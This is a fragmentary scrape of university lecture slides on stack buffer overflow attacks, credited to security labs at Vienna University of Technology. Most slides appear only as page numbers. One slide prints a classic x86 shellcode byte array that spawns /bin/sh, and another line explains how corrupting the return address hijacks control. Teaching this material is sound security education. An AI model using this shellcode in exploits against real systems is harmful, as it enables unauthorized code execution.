Attacking the stack
Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides
sws1 1 1
Attacking the stack Thanks to SysSec and Int. Secure Systems Labs - - PowerPoint PPT Presentation
Attacking the stack Thanks to SysSec and Int. Secure Systems Labs at Vienna University of Technology for some of these slides sws1 1 1 Attacking the stack We have seen how the stack works. Now: lets see how we can abuse this. We have
sws1 1 1
sws1 2
sws1 3
sws1 4
sws1 5
sws1 6
sws1 7
sws1 8
sws1 9
sws1 10
sws1 11
sws1 12
sws1 13
sws1 14
sws1 15
sws1 16
sws1 17
sws1 18
sws1 19
sws1 20
sws1 21
sws1 22
sws1 23
sws1 24
sws1 25
sws1 26
sws1 27
Both require the attacker to control the content of some buffers and corrupt the return address and frame pointer on the stack. Other options on where to jump include using environment variables.
28
sws1 29
30
31
32
33
34
35
36
char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00 \x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80 \xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff \xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
37
38
39
40
41
42
sws1 43
sws1 44
sws1 45
http://www.youtube.com/watch?v=vVZm7I1CTBs
sws1 46
sws1 47
sws1 48